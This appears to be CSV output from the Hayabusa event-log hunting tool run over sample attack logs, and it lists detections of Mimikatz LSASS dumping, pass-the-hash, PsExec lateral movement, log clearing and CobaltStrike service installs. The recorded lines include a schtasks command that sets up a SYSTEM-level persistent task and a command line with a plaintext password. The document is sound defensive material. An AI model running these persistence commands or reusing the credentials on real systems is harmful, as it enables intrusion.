admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on 
LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-27 05:41:38.966 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx +2021-03-27 05:41:39.009 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The 
Hash Sysmon and Security.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.296 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.306 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 
2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? 
| LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.860 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.861 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 
+2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:20.254 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service 
installation.evtx +2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 
0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.364 +09:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 
+09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin 
share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.531 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 -accepteula | Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:41:03.008 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:42:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | 
User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:43:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 22:30:00.569 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 22:30:03.012 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 23:56:41.780 
+09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: 
System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx +2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service 
Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System 